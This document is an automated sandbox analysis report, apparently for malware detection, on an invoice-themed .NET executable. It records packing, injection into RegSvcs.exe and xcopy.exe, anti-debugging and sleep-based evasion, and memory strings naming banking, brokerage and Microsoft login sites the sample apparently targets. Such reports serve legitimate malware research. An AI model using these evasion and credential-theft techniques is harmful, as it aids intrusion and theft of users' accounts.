                Source: Due Payment Invoice PISS2024993.exe, formMain.cs | .Net Code: InitializeComponent
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.cs | .Net Code: N6OjbSajQP System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4310b90.1.raw.unpack, Uo.cs | .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.cs | .Net Code: N6OjbSajQP System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Due Payment Invoice PISS2024993.exe.5e20000.3.raw.unpack, Uo.cs | .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.cs | .Net Code: N6OjbSajQP System.Reflection.Assembly.Load(byte[])
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: 0xC0E554B8 [Wed Jul 20 15:41:44 2072 UTC]
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Code function: 0_2_05839738 push eax; mov dword ptr [esp], ecx 0_2_0583973C
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Code function: 0_2_098D39D1 push 5DE58B90h; ret 0_2_098D3A43
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Code function: 0_2_098DFCEB push ecx; retf 0_2_098DFCEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00418261 push ds; retf 3_2_00418263
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00403200 push eax; ret 3_2_00403202
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004164C3 push edx; ret 3_2_004164C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040CD46 push es; ret 3_2_0040CD47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00415D76 pushad ; iretd 3_2_00415D7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00401E34 push edi; ret 3_2_00401E35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042CF43 push edi; iretd 3_2_0042CF4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00415F6B push ecx; retf 3_2_00416090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040CF8F push esp; retf 3_2_0040CFAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00FE09AD push ecx; mov dword ptr [esp], ecx 3_2_00FE09B6
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02FC225F pushad ; ret 6_2_02FC27F9
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02FC27FA pushad ; ret 6_2_02FC27F9
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02FC283D push eax; iretd 6_2_02FC2858
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02FF09AD push ecx; mov dword ptr [esp], ecx 6_2_02FF09B6
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02FC1200 push eax; iretd 6_2_02FC1369
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_0282059E push esi; retf 6_2_0282059F
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02820997 push ebx; retf 6_2_028209B2
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_028212AE push FFFFFFA5h; retf 6_2_028212B0
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_028132C0 push edx; ret 6_2_028132C1
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_0281505E push ds; retf 6_2_02815060
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02821693 push edx; iretd 6_2_028216AF
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_0281B6A7 push ss; ret 6_2_0281B6B4
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_028216B0 push edx; iretd 6_2_028216AF
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_0281B6B6 push ss; ret 6_2_0281B6B4
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02821445 push ecx; ret 6_2_02821446
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02815AA0 push esi; retn 9B70h 6_2_02815B2E
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_02809B43 push es; ret 6_2_02809B44
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_0281B894 push cs; retf 6_2_0281B895
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: section name: .text entropy: 7.948212011277769
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, QrhsiFI8fGT8JEOJoU.csHigh entropy of concatenated method names: 'VBnBD5hfoY9UgBaPQh2', 'TepdHvhLTl1QcVZhiAa', 'wmLKxg8DIN', 'aYkKrqL3jf', 'xTaKDOXnBU', 'iIERJthcqZj3XtEjncS', 'AWlsubhj7ga7WhER8K8', 'Y9u6S4h5jlFegX71GeR'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, UOJiyW1B2s8Z6aHpWI.csHigh entropy of concatenated method names: 'qnwg4bimWJ', 'rfGg0D5UBQ', 'xkog9D5JIr', 'ILKg16vGk2', 'm2PgJy91bx', 'CkTgmtffJk', 'DRkgeuTaqi', 'uergxPv5W3', 'E6kgrguVCh', 'zdugDnPfMC'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, nqvvsvXU7Q5cfreR9i.csHigh entropy of concatenated method names: 'v8CrHOnPPj', 'qVQrlfaLhP', 'qGNrjHdpFq', 'lY7rMgb7Tq', 'AHyrBDGRwa', 'QJgrfPqhho', 'K5GrKuRVb3', 'X5ZxwMTnJV', 'ho9xCy9A3v', 'DRqxcoZNiM'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, OyUJwmqSrpTaTYYllv.csHigh entropy of concatenated method names: 'IttyPGYkru', 'OqGy8dis6O', 'wOGyb8k1ao', 'q7Sy4ShhVw', 'MuwyEPXYSj', 'AGFy0u6T49', 'cAfySrEhFM', 'm7Qy9siOUP', 'OYay1fu31L', 'H4eykWvDWI'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, jjeIoBODgMkXuNjht9.csHigh entropy of concatenated method names: 'CF0eCDNi7l', 'mlBeXVrMXg', 'C9pxAQHZOa', 'ITmxHp4wLG', 'pOVeLvYM8m', 'OZEeVSieVT', 'JodeW60Grc', 'ri9e5qJIbC', 'OURenDKxTp', 'uhwesabk96'
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: Due Payment Invoice PISS2024993.exe PID: 1732, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: 32F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: 1820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: 9A20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: AA20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: AC40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: BC40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: C300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: D300000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102096E rdtsc 3_2_0102096E
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 9788Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\xcopy.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe TID: 4444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe TID: 5712Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe TID: 5712Thread sleep time: -37500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 5768Thread sleep count: 184 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 5768Thread sleep time: -368000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 5768Thread sleep count: 9788 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 5768Thread sleep time: -19576000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281C420 FindFirstFileW,FindNextFileW,FindClose,6_2_0281C420
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nteractive Brokers - EU East & CentralVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 56Q8T4H.6.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 56Q8T4H.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: global block list test formVMware20,11696428655
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Eivebrokers.comVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 56Q8T4H.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20T>
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: look.office.comVMware20,11696428655s
                Source: 56Q8T4H.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 56Q8T4H.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.comVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 56Q8T4H.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 56Q8T4H.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: cJjnESPXORw.exe, 00000005.00000002.3912099278.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3911641445.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2707114710.000001A10989C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 56Q8T4H.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 56Q8T4H.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: soft.com/profileVMware20,11696428655u
                Source: 56Q8T4H.6.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - NDCDYNVMware20,11696428655z
                Source: 56Q8T4H.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 56Q8T4H.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 56Q8T4H.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 56Q8T4H.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.co.inVMware20,11696428655~
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 56Q8T4H.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 56Q8T4H.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696428655n
                Source: 56Q8T4H.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004175C3 LdrLoadDll,3_2_004175C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov eax, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov ecx, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC0F0 mov eax, dword ptr fs:[00000030h]3_2_00FDC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A118 mov ecx, dword ptr fs:[00000030h]3_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A118 mov eax, dword ptr fs:[00000030h]3_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A118 mov eax, dword ptr fs:[00000030h]3_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A118 mov eax, dword ptr fs:[00000030h]3_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE80E9 mov eax, dword ptr fs:[00000030h]3_2_00FE80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA0E3 mov ecx, dword ptr fs:[00000030h]3_2_00FDA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A0115 mov eax, dword ptr fs:[00000030h]3_2_010A0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01010124 mov eax, dword ptr fs:[00000030h]3_2_01010124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov eax, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov eax, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov ecx, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov eax, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov eax, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078158 mov eax, dword ptr fs:[00000030h]3_2_01078158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE208A mov eax, dword ptr fs:[00000030h]3_2_00FE208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109C188 mov eax, dword ptr fs:[00000030h]3_2_0109C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109C188 mov eax, dword ptr fs:[00000030h]3_2_0109C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01020185 mov eax, dword ptr fs:[00000030h]3_2_01020185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01084180 mov eax, dword ptr fs:[00000030h]3_2_01084180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01084180 mov eax, dword ptr fs:[00000030h]3_2_01084180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106019F mov eax, dword ptr fs:[00000030h]3_2_0106019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106019F mov eax, dword ptr fs:[00000030h]3_2_0106019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106019F mov eax, dword ptr fs:[00000030h]3_2_0106019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106019F mov eax, dword ptr fs:[00000030h]3_2_0106019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE2050 mov eax, dword ptr fs:[00000030h]3_2_00FE2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A61C3 mov eax, dword ptr fs:[00000030h]3_2_010A61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A61C3 mov eax, dword ptr fs:[00000030h]3_2_010A61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov eax, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov eax, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov eax, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov eax, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA020 mov eax, dword ptr fs:[00000030h]3_2_00FDA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC020 mov eax, dword ptr fs:[00000030h]3_2_00FDC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE016 mov eax, dword ptr fs:[00000030h]3_2_00FFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE016 mov eax, dword ptr fs:[00000030h]3_2_00FFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE016 mov eax, dword ptr fs:[00000030h]3_2_00FFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE016 mov eax, dword ptr fs:[00000030h]3_2_00FFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B61E5 mov eax, dword ptr fs:[00000030h]3_2_010B61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010101F8 mov eax, dword ptr fs:[00000030h]3_2_010101F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01064000 mov ecx, dword ptr fs:[00000030h]3_2_01064000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01076030 mov eax, dword ptr fs:[00000030h]3_2_01076030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066050 mov eax, dword ptr fs:[00000030h]3_2_01066050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA197 mov eax, dword ptr fs:[00000030h]3_2_00FDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA197 mov eax, dword ptr fs:[00000030h]3_2_00FDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA197 mov eax, dword ptr fs:[00000030h]3_2_00FDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100C073 mov eax, dword ptr fs:[00000030h]3_2_0100C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6154 mov eax, dword ptr fs:[00000030h]3_2_00FE6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6154 mov eax, dword ptr fs:[00000030h]3_2_00FE6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC156 mov eax, dword ptr fs:[00000030h]3_2_00FDC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010780A8 mov eax, dword ptr fs:[00000030h]3_2_010780A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A60B8 mov eax, dword ptr fs:[00000030h]3_2_010A60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A60B8 mov ecx, dword ptr fs:[00000030h]3_2_010A60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010620DE mov eax, dword ptr fs:[00000030h]3_2_010620DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010660E0 mov eax, dword ptr fs:[00000030h]3_2_010660E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010220F0 mov ecx, dword ptr fs:[00000030h]3_2_010220F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A30B mov eax, dword ptr fs:[00000030h]3_2_0101A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A30B mov eax, dword ptr fs:[00000030h]3_2_0101A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A30B mov eax, dword ptr fs:[00000030h]3_2_0101A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01000310 mov ecx, dword ptr fs:[00000030h]3_2_01000310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02E1 mov eax, dword ptr fs:[00000030h]3_2_00FF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02E1 mov eax, dword ptr fs:[00000030h]3_2_00FF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02E1 mov eax, dword ptr fs:[00000030h]3_2_00FF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
